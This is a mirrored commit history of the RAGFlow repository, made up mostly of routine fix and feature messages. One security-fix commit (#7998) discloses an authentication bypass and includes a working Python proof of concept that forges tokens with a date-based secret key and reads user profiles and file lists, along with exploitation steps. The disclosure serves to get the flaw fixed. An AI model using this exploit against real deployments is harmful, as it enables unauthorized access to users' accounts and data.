ragflow

mirror of https://github.com/infiniflow/ragflow.git synced 2025-08-10 17:50:58 +00:00

Author	SHA1	Message	Date
Kevin Hu	aa4a725529	Perf: use Redis to check if canceled. (#8853 ) ### What problem does this PR solve? ### Type of change - [x] Performance Improvement	2025-07-15 17:19:27 +08:00
Kevin Hu	c642dbefca	Perf: Enhance timeout handling. (#8826 ) ### What problem does this PR solve? ### Type of change - [x] Performance Improvement	2025-07-15 09:36:45 +08:00
Yongteng Lei	237e59532b	Feat: refine create and list operations for MCP dashboard (#8823 ) ### What problem does this PR solve? Refine MCP dashboard create and list operations. ### Type of change - [x] Refactoring	2025-07-14 14:36:56 +08:00
Yongteng Lei	72c19b44c3	Refa: better MIME content type (#8801 ) ### What problem does this PR solve? Better uniform MIME content type. ### Type of change - [x] Refactoring	2025-07-11 18:47:19 +08:00
Yongteng Lei	e8aee8d720	Feat: change document status in bulk (#8777 ) ### What problem does this PR solve? Change document status in bulk. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-07-11 10:38:59 +08:00
haol	512772c45a	Fix: Resolve typo in /list route function (#8769 ) ### What problem does this PR solve? Fixes a function name typo for the `/list` route in `api/apps/conversation_app.py`. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-07-10 14:32:28 +08:00
He Wang	cedcd13204	fix: use tenant_id of kb to get index name in rm chunk func (#8760 ) ### What problem does this PR solve? The rm function in chunk_app.py now takes the index name differently than other functions, so there will be situations where users can create and update a chunk but not delete it. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-07-10 10:30:56 +08:00
Yongteng Lei	c1f6e6f00e	Feat: add advanced document filter (#8723 ) ### What problem does this PR solve? Add advanced document filter ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-07-09 09:33:11 +08:00
Liu An	addda5ccbe	Fix: Add validation for dialog name (#8722 ) ### What problem does this PR solve? - Validate dialog name in `dialog_app.py` to ensure it is a non-empty string and does not exceed 255 bytes in UTF-8 encoding. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-07-08 19:20:29 +08:00
Yongteng Lei	4d7bfd2ba3	Fix: typo process_duration (#8696 ) ### What problem does this PR solve? Fix typo process_duration. ### Type of change - [x] Documentation Update - [x] Refactoring	2025-07-07 14:11:47 +08:00
Yongteng Lei	1ac61c0f0f	Fix: secure canvas (#8670 ) ### What problem does this PR solve? Secure canvas access. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-07-04 19:40:39 +08:00
Yongteng Lei	4243330d5c	Feat: add MCP server test endpoint (#8632 ) ### What problem does this PR solve? Add MCP server test endpoint. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-07-02 18:52:24 +08:00
Liu An	0b40eb3e90	Test: Add tests for chunk API endpoints (#8616 ) ### What problem does this PR solve? - Add comprehensive test suite for chunk operations including: - Test files for create, list, retrieve, update, and delete chunks - Authorization tests - Batch operations tests - Update test configurations and common utilities - Validate `important_kwd` and `question_kwd` fields are lists in chunk_app.py - Reorganize imports and clean up duplicate code ### Type of change - [x] Add test cases	2025-07-02 09:49:08 +08:00
天海蒼灆	d4da6dce6e	Feat: Add file management HTTP_API (#8395 ) ### What problem does this PR solve? Add file management HTTP_API for operating files ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-07-01 09:51:53 +08:00
Yongteng Lei	8801de2772	Refa: change mcp_client module to rag/utils/conn (#8578 ) ### What problem does this PR solve? Change mcp_client module to rag/utils/conn. ### Type of change - [x] Refactoring	2025-07-01 09:29:19 +08:00
Yongteng Lei	0478f36e36	Feat: allow users to choose which MCP tools are enabled (#8519 ) ### What problem does this PR solve? Allow users to choose which MCP tools are enabled. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-27 10:23:34 +08:00
Stephen Hu	7dbe06f7d8	Refactor: remove useless initialize logic in list_doc (#8523 ) ### What problem does this PR solve? Remove useless logic in a loop for list_doc ### Type of change - [x] Refactoring - [x] Performance Improvement	2025-06-27 10:23:08 +08:00
zhanglei	daf6c82066	fix: list index out of range (#8518 ) ### What problem does this PR solve? Stack: ``` 2025-06-26 17:22:24,739 ERROR 1609 list index out of range Traceback (most recent call last): File "/ragflow/.venv/lib/python3.10/site-packages/flask/app.py", line 880, in full_dispatch_request rv = self.dispatch_request() File "/ragflow/.venv/lib/python3.10/site-packages/flask/app.py", line 865, in dispatch_request return self.ensure_sync(self.view_functions[rule.endpoint])(*view_args) # type: ignore[no-any-return] File "/ragflow/api/utils/api_utils.py", line 298, in decorated_function return func(args, **kwargs) File "/ragflow/api/apps/sdk/session.py", line 472, in list_session print(conv["reference"][message_num]) IndexError: list index out of range ``` ![image](https://github.com/user-attachments/assets/93fe90a8-0434-4842-ba9f-bb5a995b498a) ### Type of change - [ ] Bug Fix (non-breaking change which fixes an issue) - [ ] New Feature (non-breaking change which adds functionality) - [ ] Documentation Update - [ ] Refactoring - [ ] Performance Improvement - [ ] Other (please describe):	2025-06-27 09:38:33 +08:00
Yongteng Lei	d768130204	Fix: chunk number error after re-parsing (#8513 ) ### What problem does this PR solve? Fix chunk number error after re-parsing. #8503. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-26 17:46:53 +08:00
Liu An	d11cfd4e45	Fix: Add input validation to chunk creation endpoint (#8516 ) ### What problem does this PR solve? - Include optional `tag_feas` field if present in request - Add input validation for `important_kwd` and `question_kwd` to ensure they are lists - #8462 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-26 17:46:00 +08:00
Yongteng Lei	0eb90e73a5	Feat: add MCP dashboard functionalities list_tools and test_tool (#8505 ) ### What problem does this PR solve? Add MCP dashboard functionalities list_tools and test_tool. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-26 13:52:01 +08:00
Liu An	dac5bcdf17	Fix: Enforce default embedding model in create_dataset / update_dataset (#8486 ) ### What problem does this PR solve? Previous: - Defaulted to hardcoded model 'BAAI/bge-large-zh-v1.5@BAAI' - Did not respect user-configured default embedding_model Now: - Correctly prioritizes user-configured default embedding_model Other: - Make embedding_model optional in CreateDatasetReq with proper None handling - Add default embedding model fallback in dataset update when empty - Enhance validation utils to handle None values and string normalization - Update SDK default embedding model to None to match API changes - Adjust related test cases to reflect new validation rules ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-25 16:41:32 +08:00
Yongteng Lei	af6850c8d8	Feat: add MCP dashboard operations (#8460 ) ### What problem does this PR solve? Add MCP server dashboard operations. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-25 09:26:04 +08:00
Stephen Hu	382d2d0373	Refactor: Improve insert file logic (#8445 ) ### What problem does this PR solve? Before the refactor: 1. Create the file record. 2. Add the file to blob storage. If an exception occurs at step 2, the system DB has a file record with no related blob, which can introduce bugs. After the refactor: 1. Add the file to blob storage. 2. Create the file record. If step 1 succeeds but step 2 fails, only a dirty blob is left in blob storage, which the user will not notice. ### Type of change - [x] Refactoring	2025-06-24 13:17:22 +08:00
Song Fuchang	fd7ac17605	Feat: Scratch MCP tool calling support. (#8263 ) ### What problem does this PR solve? This is a cherry-pick from #7781 as requested. ### Type of change - [x] New Feature (non-breaking change which adds functionality) Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-06-23 17:45:35 +08:00
Yongteng Lei	936a91c5fe	Fix: code debug may be corrupted by history answer (#8385 ) ### What problem does this PR solve? Fix code debug being corrupted by history answer. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-20 14:23:02 +08:00
Liu An	9077ee8d15	Fix: desc parameter parsing (#8362 ) ### What problem does this PR solve? - Correct boolean parsing for 'desc' parameter in document_app.py to properly handle string values ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-19 14:22:56 +08:00
RyanFernandes23	c8b1790c92	Fix typo in dataset name length error message (#8351 ) ### What problem does this PR solve? Fixes a minor grammar issue in a user-facing error message. The original message said "large than" instead of the correct comparative form "larger than". Just a quick fix I noticed while reading the code. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-19 09:54:30 +08:00
Yongteng Lei	1b022116d5	Feat: wrap search app (#8320 ) ### What problem does this PR solve? Wrap search app ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-18 16:45:42 +08:00
Liu An	0a13d79b94	Refa: Implement centralized file name length limit using FILE_NAME_LEN_LIMIT constant (#8318 ) ### What problem does this PR solve? - Replace hardcoded 255-byte file name length checks with FILE_NAME_LEN_LIMIT constant - Update error messages to show the actual limit value - #8290 ### Type of change - [x] Refactoring Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-06-17 18:01:30 +08:00
Liu An	64e281b398	Fix: Add validation for empty filenames in document_app.py (#8321 ) ### What problem does this PR solve? - Add validation for empty filenames in document_app.py and trim whitespace ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-17 15:53:41 +08:00
Liu An	a3bebeb599	Fix: Enforce 255-byte filename limit (#8290 ) ### What problem does this PR solve? - Add filename length validation (<=255 bytes) for document upload/rename in both HTTP and SDK APIs - Update error messages for consistency - Fix comparison operator in SDK from '>=' to '>' for filename length check ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-16 16:39:41 +08:00
Kevin Hu	f7074037ef	Feat: Let number of task ahead be visible. (#8259 ) ### What problem does this PR solve? ![image](https://github.com/user-attachments/assets/d4ef0526-343a-426f-a85a-b05eb8b559a1) ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-13 17:32:40 +08:00
Liu An	99725444f1	Fix: desc parameter parsing (#8229 ) ### What problem does this PR solve? - Fix boolean parsing for 'desc' parameter in kb_app.py to properly handle string values ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 19:17:47 +08:00
Liu An	7fbbc9650d	Fix: Move pagerank field from create to update dataset API (#8217 ) ### What problem does this PR solve? - Remove pagerank from CreateDatasetReq and add to UpdateDatasetReq - Add pagerank update logic in dataset update endpoint - Update API documentation to reflect changes - Modify related test cases and SDK references #8208 This change makes pagerank a mutable property that can only be set after dataset creation, and only when using elasticsearch as the doc engine. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 15:47:49 +08:00
Liu An	d0c5ff04a6	Fix: Add pagerank validation for non-elasticsearch doc engines (#8215 ) ### What problem does this PR solve? Validate that pagerank updates are only allowed when using elasticsearch as the document engine. Return an error if pagerank is set while using a different doc engine, preventing potential inconsistencies in document scoring. #8208 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 15:47:22 +08:00
Liu An	cef587abc2	Fix: Add validation for dataset name in KB update API (#8194 ) ### What problem does this PR solve? Validate dataset name in knowledge base update endpoint to ensure: - Name is a non-empty string - Name length doesn't exceed DATASET_NAME_LIMIT - Whitespace is trimmed before processing Prevents invalid dataset names from being saved and provides clear error messages. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 11:37:25 +08:00
Liu An	60c1bf5a19	Fix: duplicate knowledgebase name validation logic (#8199 ) ### What problem does this PR solve? Change the condition from checking for >1 to >=1 when validating duplicate knowledgebase names to properly catch all duplicates. This ensures no two knowledgebases can have the same name for a tenant. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 09:46:57 +08:00
Liu An	e87ad8126c	Fix: Improve dataset name validation in KB app (#8188 ) ### What problem does this PR solve? - Trim whitespace before checking for empty dataset names - Change length check from >= to > DATASET_NAME_LIMIT for consistency ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-11 16:14:29 +08:00
Stephen Hu	e6f68e1ccf	Fix: When listing KBs, the total is sometimes wrong (#8151 ) ### What problem does this PR solve? In the kb.app list method, the total is calculated incorrectly when owner_ids is given (now will base on the paged result to calculate total) ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-10 11:34:30 +08:00
yurhett	9c6c6c51e0	Fix: use jwks_uri from OIDC metadata for JWKS client (#8136 ) ### What problem does this PR solve? Issue: #8051 The current implementation assumes JWKS endpoints follow the standard `/.well-known/jwks.json` convention. This breaks authentication for OIDC providers that use non-standard JWKS paths, resulting in 404 errors during token validation. Root Cause Analysis - The OpenID Connect specification doesn't mandate a fixed path for JWKS endpoints - Some identity providers (like certain Keycloak configurations) use custom endpoints - Our previous approach constructed JWKS URLs by convention rather than discovery ### Solution Approach Instead of constructing JWKS URLs by appending to the issuer URI, we now: 1. Properly leverage the `jwks_uri` from the OIDC discovery metadata 2. Honor the identity provider's actual configured endpoint ```python # Before (fragile approach) jwks_url = f"{self.issuer}/.well-known/jwks.json" # After (standards-compliant) jwks_cli = jwt.PyJWKClient(self.jwks_uri) # Use discovered endpoint ``` ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-10 10:16:58 +08:00
Liu An	968ffc7ef3	Refa: dataset operations to simplify error handling (#8132 ) ### What problem does this PR solve? - Consolidate database operations within single try-except blocks in the methods ### Type of change - [x] Refactoring	2025-06-09 13:29:56 +08:00
Liu An	8b7c424617	Fix: Document.update() now refreshes object data (#8068 ) ### What problem does this PR solve? #8067 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 12:46:29 +08:00
Gecko Security	de89b84661	Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998 ) ### Description There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system. The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls. ### Source - Sink Analysis Source (User Input): HTTP Authorization header containing attacker-controlled JWT token Flow Path: 1. Entry Point: `load_user()` function in `api/apps/__init__.py` (Line 142) 2. Token Processing: JWT token extracted from Authorization header 3. Secret Key Usage: Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123) 4. Database Query: `UserService.query()` called with decoded empty access_token 5. Sink: Authentication succeeds, returning first user with empty access_token ### Proof of Concept ```python import requests from datetime import date from itsdangerous.url_safe import URLSafeTimedSerializer import sys def exploit_ragflow(target): # Generate token with predictable key daily_key = str(date.today()) serializer = URLSafeTimedSerializer(secret_key=daily_key) malicious_token = serializer.dumps("") print(f"Target: {target}") print(f"Secret key: {daily_key}") print(f"Generated token: {malicious_token}\n") # Test endpoints endpoints = [ ("/v1/user/info", "User profile"), ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing") ] auth_headers = {"Authorization": malicious_token} for path, description in endpoints: print(f"Testing {description}...") response = requests.get(f"{target}{path}", headers=auth_headers) if response.status_code == 200: data = response.json() if data.get("code") == 0: print(f"SUCCESS {description} accessible") if "user" in path: user_data = data.get("data", {}) print(f" Email: {user_data.get('email')}") print(f" User ID: {user_data.get('id')}") elif "file" in path: files = data.get("data", {}).get("files", []) print(f" Files found: {len(files)}") else: print(f"Access denied") else: print(f"HTTP {response.status_code}") print() if __name__ == "__main__": target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost" exploit_ragflow(target_url) ``` Exploitation Steps: 1. Deploy RAGFlow with default configuration 2. Create a user and make at least one user log out (creating empty access_token in database) 3. Run the PoC script against the target 4. Observe successful authentication and data access without any credentials Version: 0.19.0 @KevinHuSh @asiroliu @cike8899 Co-authored-by: nkoorty <amalyshau2002@gmail.com>	2025-06-05 12:10:24 +08:00
Liu An	ab5e3ded68	Fix: DataSet.update() now refreshes object data (#8058 ) ### What problem does this PR solve? #8057 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 09:26:19 +08:00
Stephen Hu	b832372c98	Fix: /v1/conversation/completion KeyError: 'conversation_id' (#8037 ) ### What problem does this PR solve? Close #8033 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-04 10:18:14 +08:00
Kevin Hu	b6f1cd7809	Fix: no kb selected for an assistant. (#8021 ) ### What problem does this PR solve? ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-03 17:42:16 +08:00
Liu An	e64da8b2aa	Fix: sdk can not update chat model (#8016 ) ### What problem does this PR solve? #7791 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-03 15:22:26 +08:00
Jin Hai	31f4d44c73	Update upload filename length limit from 128 to 256, which is aligned with os (#7971 ) ### What problem does this PR solve? Change filename length limit from 128 to 256 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2025-05-30 14:25:59 +08:00
Stephen Hu	62611809e0	Fix: Add user_id when create Conversation (#7960 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/7940 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 13:11:41 +08:00
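
Several commits above (#8722 for dialog names, #8290 and #8321 for file names) describe the same validation rules: trim whitespace, reject empty values, and cap the UTF-8 byte length at 255 using `>` rather than `>=`. A minimal sketch of those rules follows. It assumes a hypothetical helper `validate_name` and made-up error strings; neither is taken from the RAGFlow code. Only the constant name `FILE_NAME_LEN_LIMIT` and the value 255 come from the commit messages.

```python
# Constant name and value as mentioned in #8318 / #8290; everything else is illustrative.
FILE_NAME_LEN_LIMIT = 255  # bytes


def validate_name(raw, limit=FILE_NAME_LEN_LIMIT):
    """Return (cleaned_name, error_message). Hypothetical helper, not RAGFlow's API."""
    if not isinstance(raw, str):
        return None, "Name must be a string."
    name = raw.strip()  # trim whitespace before the emptiness check
    if not name:
        return None, "Name cannot be empty."
    # Measure the UTF-8 byte length, not the character count.
    # '>' (not '>=') means a name of exactly `limit` bytes is accepted.
    if len(name.encode("utf-8")) > limit:
        return None, f"Name must be {limit} bytes or less."
    return name, None
```

The byte-length check matters for non-ASCII names: a name made of three-byte characters reaches the limit after 85 characters, not 255.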


615 Commits
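
Commit de89b84661 (#7998) names two flaws: a `SECRET_KEY` that defaults to `str(date.today())`, and an empty `access_token` being accepted during user lookup. The sketch below shows one plausible way to address both. It is not necessarily what the PR changed, and the function names `random_secret_key` and `is_usable_access_token` are hypothetical.

```python
import secrets
from datetime import date


def predictable_secret_key() -> str:
    """The default described in #7998: anyone can recompute today's date."""
    return str(date.today())


def random_secret_key(nbytes: int = 32) -> str:
    """Hypothetical replacement: an unguessable key from the OS CSPRNG."""
    return secrets.token_hex(nbytes)


def is_usable_access_token(access_token) -> bool:
    """Hypothetical guard: refuse empty tokens before any user lookup."""
    return isinstance(access_token, str) and access_token.strip() != ""
```

A randomly generated key would have to be persisted and shared by all server processes; regenerating it on every start would invalidate previously issued tokens.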